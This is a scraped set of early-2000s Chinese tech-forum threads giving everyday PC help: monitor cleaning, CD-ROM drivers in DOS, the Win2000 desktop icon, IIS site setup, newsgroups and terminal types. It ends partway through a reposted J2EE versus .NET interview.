管它呢。如果只是一般的显示器，例如我的IBM2124　15"数控，随便拿张餐巾纸擦一下不就行了？反正当时拿回来也是二手货，才500块。如果是专业显示器，有镀膜的，首先不要随便用手在上面指点江山。因为手上的油脂会腐蚀镀膜；其次就是一定要用镜头纸擦拭，因为镜头纸是经过特殊处理的纸张，把一些硬纤维都去掉了，这样的纸柔软，擦起来就不会划伤屏幕了。

我始终相信，自己是优秀的，但并不是最优秀的。所以我努力、用心，用心做好每件事……
F鹰

超级用户
积分：313
发帖：94
来自：
注册：2002-02-27
 发表于 2002-03-11 01:34:07 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP
眼镜的膜和显示器的膜是相似的？？？？？？？？？？？？
不是吧

=BULEIDEA=SOS
傻fox

初级用户
积分：12
发帖：9
来自：当然是灵山狐狸洞啦!
注册：2002-03-11
 发表于 2002-03-11 13:49:59 按此观看傻fox的个人资料 按此发邮件给傻fox 访问傻fox的主页 傻fox 的 oicq 是45968666,查看 45968666 的资料 发送悄悄话给傻fox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻fox的IP
你带眼镜吗?那就不用花钱了,用眼镜布兼容一下吧!

我是狐狸我怕谁?
这个主题共有2页：1 2 上一贴 | 下一贴
快速回复 主题：拿什么擦显示器 ？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


光驱不见了,咋办? - 经 典 论 坛

计算机技术
光驱不见了,咋办?

上一贴 | 下一贴
发表人 主题: 光驱不见了,咋办?
有时好心的坏蛋

终级用户
积分：723
发帖：247
来自：广东
注册：2001-11-20
 发表于 2002-03-08 21:18:08 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 收藏该主题供以后查看 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP
光驱的盘符不见了怎么找回来.
请问关不关BIOS的事?注册表呢?
还有再问多一个问题,WIN2000的显示桌面图标在那里弄出来?

这家伙很懒，什么也没有留下

http://idiot.sharella.com

Cinkey

我和我追逐的梦
积分：1138
发帖：2440
来自：杭州
注册：2001-06-21
 发表于 2002-03-08 21:22:55 按此观看Cinkey的个人资料 按此发邮件给Cinkey 访问Cinkey的主页 Cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给Cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Cinkey的IP
在设备管理器扫描硬件改动试试....

 悠 長 假 期   |  反恐联盟  |  CS服务器状态查看
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-03-08 21:26:24 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
在Windows操作系统中，任务栏的显示桌面图标目标文件是“C:\Windows\Application Data\Microsoft\Internet Explorer\Quick Launch\显示桌面.scf”，所以如果需要恢复该图标，只需要在原处重新建立一个“显示桌面.scf”文件即可。

    可以使用记事本等文本编辑器，重新用以下内容建立一个显示桌面.scf文件。

[Shell]
Command=2
IconFile=explorer.exe,3

[Taskbar]
Command=ToggleDesktop

关于光驱
装了什么软件冲掉了？
在设备管理器里面
看IDE有没有冲突的黄色惊叹号~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

zb

初级用户
积分：144
发帖：40
来自：china
注册：2001-02-14
 发表于 2002-03-08 21:35:23 按此观看zb的个人资料 按此发邮件给zb zb 的 oicq 是52246568,查看 52246568 的资料 发送悄悄话给zb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zb的IP
找张光驱驱动盘，装一下。

好朋友简简单单,好情意清清爽爽,好缘分久久长长.
sky2000

终级用户
积分：2258
发帖：849
来自：WuHan.CN
注册：2001-01-22
 发表于 2002-03-08 23:41:04 按此观看sky2000的个人资料 按此发邮件给sky2000 sky2000 的 oicq 是6256954,查看 6256954 的资料 发送悄悄话给sky2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sky2000的IP
看你是不是動了注冊表的，要是的話估計是把光驅的那一項關了。有關這方面的文章你到blueonline的站去看看。

I Love This !
Biketrial football basketball music......
..:::sky2000.tk:::..
自在

终级用户
积分：1179
发帖：322
来自：京·北
注册：2002-03-04
 发表于 2002-03-09 00:05:44 按此观看自在的个人资料 按此发邮件给自在 自在 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给自在 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自在的IP
可能是注册表的事~
http://www.blueidea.com/bbs/newsdetail.asp?id=374532

修 身　·　齐 家　·　治 业　·　平 天 下
wellcome to visit our BBS　BLUELUNIX
有时好心的坏蛋

终级用户
积分：723
发帖：247
来自：广东
注册：2001-11-20
 发表于 2002-03-09 01:00:20 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP
yunbin在上个帖子中说
引用:
在Windows操作系统中，任务栏的显示桌面图标目标文件是“C:\Windows\Application Data\Microsoft\Internet Explorer\Quick Launch\显示桌面.scf”，所以如果需要恢复该图标，只需要在原处重新建立一个“显示桌面.scf”文件即可。

不明白的是WIN2000的文件怎么跑去了C盘的？？
害得我在D盘找了N遍！！！谢谢你了。

这家伙很懒，什么也没有留下

http://idiot.sharella.com

路明

超级用户
积分：425
发帖：133
来自：山东临沂
注册：2002-01-12
 发表于 2002-03-09 11:50:52 按此观看路明的个人资料 该用户不允许显示它的电子邮件 访问路明的主页 路明 的 oicq 是3767454,查看 3767454 的资料 发送悄悄话给路明 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看路明的IP
我遇过这样的问题。但是始终没有找到原因，格了装也不行（我采用硬盘安装），光驱是SICS的

如果说有钱是一种错，我宁愿一错再错，可是现在我没有错。
欢迎访问：好易商务网 好易网站制作论坛 哇哈特效站
barry

终级用户
积分：731
发帖：371
来自：上海
注册：2001-01-29
 发表于 2002-03-09 14:17:12 按此观看barry的个人资料 按此发邮件给barry 访问barry的主页 barry 的 oicq 是24319347,查看 24319347 的资料 发送悄悄话给barry 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看barry的IP
zb在上个帖子中说
引用:
找张光驱驱动盘，装一下。

这位兄弟说得对，光驱盘符找不到，设备管理里不一定会出黄色感叹的，随便找一个驱动盘，在win里面装一下，肯定行！！！

A bosom friend afar brings a distant land near.
海内存知己,天涯若比邻
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-03-09 17:40:17 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
1、WIN2000的显示图标，在最下面任务栏
右键
工具栏
快速启动（打上钩）

2、光驱符不见
在系统所在盘如C或D
选中CONFIG文件
以文本方式开打
改LASTDRIVE=Z

别望给寡人打个分！

誓与WIN2000共存
ackinggj

高级用户
积分：191
发帖：50
来自：
注册：2002-02-22
 发表于 2002-03-09 22:01:26 按此观看ackinggj的个人资料 按此发邮件给ackinggj ackinggj 的 oicq 是12071440,查看 12071440 的资料 发送悄悄话给ackinggj 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ackinggj的IP
你可以用以下的一段通用光驱驱动程序百试百灵的：
1、编辑c:\autoexec.bat
在其中加入c:\windows\command\mscdex.exe/d:mscd001
2、再打开c:\config.sys
在其中加入device=c:\windows\command\ebd\oakcdrom.sys/d:mscd001
3、然后重新启动就万事OK了 。 ：P
4、如不行一定要通知我，不过我认为一定行的，只要你的硬件没有问题！！！！

我是网页初学者，
请大家多多关照！
上一贴 | 下一贴
快速回复 主题：光驱不见了,咋办?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


全角和半角有什么区别？ - 经 典 论 坛

计算机技术
全角和半角有什么区别？

上一贴 | 下一贴
发表人 主题: 全角和半角有什么区别？
arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2001-12-10 18:46:35 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 收藏该主题供以后查看 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
如上

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
poorfish

经典圣僧
现任版主
积分：11474
发帖：3691
来自：江西萍乡
注册：2000-12-04
 发表于 2001-12-11 11:09:57 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
这些是全角，。；“”
这些是半角 ,.;""

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2001-12-11 11:56:56 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
半角方式下显示时占半个汉字的位置，全角方式下显示占一 个汉字的位置

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2001-12-22 21:00:34 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
yunbin在上个帖子中说
引用:
半角方式下显示时占半个汉字的位置，全角方式下显示占一 个汉字的位置

这个回答我很满意,谢谢!

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
上一贴 | 下一贴
快速回复 主题：全角和半角有什么区别？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


关于新闻组 - 经 典 论 坛

计算机技术
关于新闻组

上一贴 | 下一贴
发表人 主题: 关于新闻组
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-01-21 16:57:39 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 收藏该主题供以后查看 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
搜索了半天没反映，只好问一下了：
1。新闻组的使用
2。好的地址
3。与论坛的比较

谢了，如果你有相关的文章，麻烦你贴一下。

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-21 21:08:22 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
在Internet这座资源宝库里，如何快速、便捷地找到自己需要的东西呢？除了正确使用搜索引擎、BBS等工具外，另一个获取资源的有效途径就是使用新闻组。所谓新闻组，就是由公司或个人把不同主题的资源（贴子）分门别类地存放在“新闻服务器”（一台连网的计算机）上，方便人们查找资料、了解时事、张贴信息、提出问题……说白了，就是一个人们在网上可以自由交流的场所。它有一个最大的好处就是信息可以像E-mail一样下载到硬盘上离线阅读，为你节省不少银子。

    阅读新闻组内容，须要借助新闻阅读软件。这里，我们以IE自带的新闻阅读组件Outlook Express为例，具体谈谈如何订阅“济南万千”（webking.online.jn.sd.cn）新闻组。

    一、基本设置

    打开Outlook Express(以下简称OE)，点击菜单栏“工具”/“帐号”，在弹出的对话框中，选择“添加”/“新闻”，这时，会弹出一个向导，帮助你完成设置。第一步，填写“姓名”，不一定要真名，昵称即可。第二步，正确填写你的E-mail地址，便于网友以后给你写信;第三步，填写服务器的域名或IP（webking.online.jn.sn.cn）;第四步，填入“友好名称”，这是填新闻组的名称，可随便填写，如:济南万千;第五步，选择连接类型，如果是普通拨号用户，选择第一项“通过本地电话线连接”，如果是局域网用户，请选择第二项“通过本地局域网连接”，单击“下一步”，再单击“完成”。OK，新闻组的设置就算完成了。

    二、订阅新闻组

    设置完成后，关闭“Internet帐号”对话框，Outlook Express会提示用户是否从添加的新闻组服务器中下载新闻组，如果用户是在线状态，选择“是”后，系统将自动连接新闻组服务器并下载新闻组，所有新闻组目录将在“全部”选项的列表框中显示出来。如果你对某些新闻组感兴趣的话，可将光标移到该新闻组标题上，单击“预订”或双击它，该新闻组标题前就会出现一个标志符号，表示该新闻组被“预订”，这时你单击“已预订”选项的列表框就可以看到已经预订的所有新闻组。如果要取消预订，可以把光标移到相应的新闻组标题上，单击“取消预订”或双击它就可以了。

    预定完后，就可以阅读。打开新闻组界面，在邮件列表中可以看到每封信的主题，如果这时你在线，阅读方式就和读普通邮件一样，用鼠标点击想读的主题就可以看见里边的内容。但在线阅读会占用较长的上网时间，最好的办法是把你感兴趣的主题下载到本地硬盘上，下线后慢慢阅读。具体做法为:在要下载的邮件处单击鼠标右键，选择“标记要下载的邮件”项，然后在“工具”栏中选择“下载该新闻讨论组”选项，Outlook Express将自动开始下载新闻讨论组，下载完毕即可离线阅读。

    三、发表观点和提出问题

    你可以在新闻服务器上发布消息或提出问题。操作步骤为:选中适合的新闻组，点击工具栏上的“新邮件”，在出现的窗口中，输入主题和正文后，点击“投递邮件”就可以了。

    如果你对正在阅读的某则消息或问题有自己的看法和见解，也可以在新闻服务器上去发表。具体作法为:选中主题，点击鼠标右键，在弹击的下拉菜单中按“回复新闻组”或“回复作者”按钮。如果“回复新闻组”，你回复的内容将被送到新闻服务器原主题之后，大家都可以看到;选“回复作者”，你的回复内容将通过E-mail直接传送给发言者本人，其他人看不到。但无论是选前者还是后者，接下来都跟发E-mail差不多，最后点击窗口上的“投递邮件”就可以了。

    四、使用技巧

    1.当你订阅了新闻组后，你会发现在OE的左栏中，除“收件箱”、“发件箱”等与E-mail有关的项目之外，又多出了一项“济南万千”，单击左边的小加号，展开该项，你会看见你已预订的组，为了提高下载效率，我们可作如下处理:右键单击新闻组标题，在弹出的菜单中选“检索标记”/“新邮件”，这时，该新闻组图标前就会出现一个小蓝箭头，这样你就不会下载以前已经下载过的帖子了。

    2.点击你想看的组，OE的右上方就会出现组里的所有帖子，这么多的帖子是不是有点乱，别急只要你点击OE右上栏“时间”、“发信人”，就可按指定的内容排序。如果只想显示特定的帖子，可按“查看”/“当前查看”，选择相应的选项即可，如显示“未读的邮件”或“回复给我的邮件”等。要是想查找某一特定的邮件，可使用“编辑”/“查找邮件”。

    3.如果想在每封帖子后边加上同样的一段话，也就是“签名”，可作如下设置:点击“工具”/“信纸”，在“新闻”子卡中按“签名”，在方框中写入一段话，最后在“在所有发出的邮件中添加该签名”前打勾就可以了。

    4.如果你经常往新闻服务器上发帖子，那么在下载新闻组时，你会把你发送的帖子也下载回来，这样会浪费你不少时间。为了避免这种事情，你可以使用筛选邮件功能:点“工具”/“新闻组筛选器”，按“添加”，在筛选目标中选所有组，在“发信人”中填入自己的昵称就OK了。

    5.如果发了一封邮件，又想在服务器中把它删除，你可以在OE右上栏右键单击自己发的邮件，在弹出的菜单中选“取消“，OE就会自动发一封帖子，命令服务器删除该文件，当然，你只能删除自己发的帖子。不过，有些服务器不支持这项功能。

    6.如果你无法给邮件作者回信，请点击“工具”/“选项”，在“常规”中，将“把Outlook Express设为默认的Simple MAPI程序”选上，重新启动后就OK了。

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：关于新闻组
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


多个站点使用同一IP进行访问 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
多个站点使用同一IP进行访问

上一贴 | 下一贴
发表人 | 主题: 多个站点使用同一IP进行访问
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-19 21:12:24 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 打开"Internet Information Services"新建一个“web site”，在"Web Site Creation Wizard"中的"IP Adress and Port Setting"中填上你的IP和该site所要求的TCP端口号码，再填上该站点对应的host header name，下一步选择发布站点的path，最后点finish. 这样，你若创建另外一个site，使用不同的TCP号码或不同的host header name，那么你在IE中访问时，可以使用http://host header name来访问不同的site，或者使用不同的TCP，如http://IP Adress:TCP port来访问不同的site，这样就实现了多个站点使用同一IP进行访问。 当然你还可以在已有的site上面设置，方法是：站点的属性标签下，选择"Web Site"->"Web Site Identification"->"Advanced"中修改每个site所对应的TCP端口号码或host header name ::古落根门:: 唯有不断学习 才能不断进步
上一贴 | 下一贴
快速回复 主题：多个站点使用同一IP进行访问
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


什么是终端机的型态? - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
什么是终端机的型态?

上一贴 | 下一贴
发表人 主题: 什么是终端机的型态?
belle

终级用户
积分：456
发帖：131
来自：
注册：2002-02-23
 发表于 2002-03-03 15:38:03 按此观看belle的个人资料 按此发邮件给belle 收藏该主题供以后查看 发送悄悄话给belle 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看belle的IP
我用netTerm上bbs，在注册时要求输入我终端机的型态，我想请教终端机型态指的是什么，我该怎么填写？
另外在设置地址薄的时候有个模拟状态，应该怎么选，是什么含义?

我用的是中国网通.
belle

终级用户
积分：456
发帖：131
来自：
注册：2002-02-23
 发表于 2002-03-03 18:00:46 按此观看belle的个人资料 按此发邮件给belle 发送悄悄话给belle 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看belle的IP
没人知道吗？大家帮我解答一下啊？谢谢
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-03-04 09:39:36 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
很久不上bbs了，记得以前注册的时候终端机形态这一项都是直接回车，即选默认的[vt100] 。
我以前用的是cterm ，里面国内的bbs地址比较全，使用也很简单，net term了解的不是很多。

引用:

一个终端机是一个萤幕与一个键盘的组合，其型别有vt100, vt102, vt220,
sun, hp, ansi 等。基本上这些型别就是不同公司的不同产品型号，他们之间的差
异在於控制游标的方法不同，按键时键盘产生的键盘代码不同，以及是否有彩色能
力等。
由於设计先天不良，UNIX无法自动侦测终端机的型别，必须以人工的方式告知
。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：什么是终端机的型态?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请问除了用windows启动盘启动光驱之外，还有什么办法在纯 - 经 典 论 坛

计算机技术
请问除了用windows启动盘启动光驱之外，还有什么办法在纯

上一贴 | 下一贴
发表人 主题: 请问除了用windows启动盘启动光驱之外，还有什么办法在纯
soandy

初级用户
积分：69
发帖：23
来自：广东省
注册：2001-12-21
 发表于 2001-12-22 02:55:27 按此观看soandy的个人资料 按此发邮件给soandy 访问soandy的主页 soandy 的 oicq 是3709178,查看 3709178 的资料 收藏该主题供以后查看 发送悄悄话给soandy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看soandy的IP
请问除了用windows启动盘启动光驱之外，还有什么办法在纯DOS下启动光驱？
我听人说过只要输入一些数就可以启动光区了，请把如何启动的详细的程序
写下来给我看。多谢！

soandy
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-22 11:52:55 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
没这回事

DOS下驱动光驱必须要有驱动程序
就是.sys的文件

少了这些文件
绝对无法启动光驱

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
flashsj

终级用户
积分：527
发帖：257
来自：闪客一族
注册：2001-09-22
 发表于 2001-12-22 16:04:53 按此观看flashsj的个人资料 按此发邮件给flashsj 访问flashsj的主页 flashsj 的 oicq 是82647353,查看 82647353 的资料 发送悄悄话给flashsj 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flashsj的IP
好象只可以先设置cmos
然后才可以光驱启动

__________FLASHSJ 间谍㈦㈢㈥㈤和伐木工的兄弟!__________
FLASH专业论坛“闪客一族” http://flashsj.yeah.net
cinkey

我和我追逐的梦
积分：1138
发帖：2440
来自：杭州
注册：2001-06-21
 发表于 2001-12-22 16:35:50 按此观看cinkey的个人资料 按此发邮件给cinkey 访问cinkey的主页 cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cinkey的IP
flashsj在上个帖子中说
引用:
好象只可以先设置cmos
然后才可以光驱启动

那是光盘启动盘
上面说的是如何在纯DOS下使用光驱

 悠 長 假 期   |  反恐联盟  |  CS服务器状态查看
print

终级用户
积分：805
发帖：227
来自：萍乡 江西
注册：2001-12-13
 发表于 2001-12-27 21:19:51 按此观看print的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给print 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看print的IP
呵呵~不知道还要不要！要的话找我！！

不过感觉不太好使！本人在使的过程中就遇到问题！·

变化并不可怕，可怕的是你不随着变化而变化。
mao

现任版主
积分：1694
发帖：691
来自：北京
注册：2000-07-23
 发表于 2001-12-28 02:58:44 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
找一张光驱驱动，什么都不用弄了

解决问题才有进步
解决问题才有进步
DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2001-12-28 11:54:16 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
在 config.sys 写
device=c:\xxxx.sys /d:mscd001

在 autoexec.bat 写
c:\dos\mscdex /d:mscd001

注: xxxx.sys 是你 cdrom 的驱动

木有签名#@$%
上一贴 | 下一贴
快速回复 主题：请问除了用windows启动盘启动光驱之外，还有什么办法在纯
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


[转载]Java 2 企业版与.NET - 经 典 论 坛

计算机技术
[转载]Java 2 企业版与.NET

上一贴 | 下一贴
发表人 主题: [转载]Java 2 企业版与.NET
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-02 10:55:50 按此观看dancing的个人资料 按此发邮件给dancing 收藏该主题供以后查看 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
[本文摘自某次的JavaLive的线上谈话，这是由Sun的Java官方站点组织的若干活动之一，最近VS.NET的发布和JavaOne还有4月的TechED，颇有些要将2002的春天烘托得生气勃勃的样子。Sun和Microsoft今年必将在.Net和Java上争得你死我活。]
[转自ZDNet]

MDR-EdO:欢迎大家来到JavaLive！今天的主题是JavaTM 2 平台企业版（J2EETM）与.NET。这两个工作平台的功能都能够覆盖很多相同的领域,比如web服务，所以，把二者进行比较是很自然的。许多人对把J2EE&#8482;同.Net进行比较有何意义存在疑问，为了回答这些问题，我们很荣幸的请到了《Distributed and enterprise computing》的知名作者及顾问Jim Farley。Jim是哈佛大学IT中心的主要软件设计师，它可以回答大家的问题，那我们现在就开始吧-谁来提第一个问题？

MrWeb:很多人认为.NET在对WEB的设计理念上要优于J2EE&#8482;，因为.NET是专为WEB服务设计开发的。而J2EE只是一个翻版（也就是把APIs 象 JAXP 和 JAXR加入到了平台中），您认为这个观点有价值吗？

Jim Farley:这是个很好的问题，而且经常有人会问这样的问题。这里有很多实际的例子，微软花了很大力气来重新设计它的基础架构，就是为了使其适用于WEB服务。作为一个公开的标准，J2EE很自然的也会长期跟踪、升级它的一些协议、规范。但是如果你把商家和商家相比较（比如说微软和BEA,IBM）,那么，你就会发现，在Java的领域里，存在很多模糊的WEB服务解决方式。对于Java团体来说，如果把这些模糊概念变成规范，那么，Java的发展必将会更好。

Al-Bandy: 在今后的几年里，您认为J2EE和.NET的竞争，最终会出现一个胜利者还是二者共存？

Jim Farley:我无法预测谁会是最后的赢家。微软有其自己独特的市场运作方式，同时，J2EE也有其强大的惯性和实力。我想它们会有效利用企业空间，在中短期内按某些方式同时存在。

Bob Rodes:在我看来，二者的主要区别好象在于标准的公开程度上，.NET更保守一些，J2EE更公开一些。有没有横向或纵向的交易额的比较？.NET要快一些但要受限于微软平台，J2EE慢一些但不受平台限制。是不是由于过于简化而是性能降低了？

Jim Farley:快慢只是一个相对概念，在衡量交易量上有很多这样的因素需要考虑。但是无可非议的是，.NET对于Wintel环境而言是最佳的选择。但是，在J2EE架构了也没有什么因素妨碍商家开发类似于"Wintel-optimized"的J2EE运行环境（当然，这里面也有许多恶意诽谤者）。

nigelk:现在在WEB服务上使用XML已经使平台或技术的概念逐渐独立了，因此，J2EE 或.NET能否提供更好的工具或平台不应该成为主要的问题。

Jim Farley:非常正确。在理想环境下，这两种平台在WEB服务规范和支持基础架构上应该毫无关联的，与"SOAP/WSDL/UDDI"相互融合应该是一个很好的机会。但是，一般商家的"value-add"问题会仍然存在（微软就是一个最大的商家，但却不是唯一的一家具有保守心理的商家）。不公开化这一附加因素将会使WEB的集成会象使市场成熟那样困难。

Fogus:就微软认为C#即是Java这一概念，您是怎么理解的？为什么我们只能选其一？

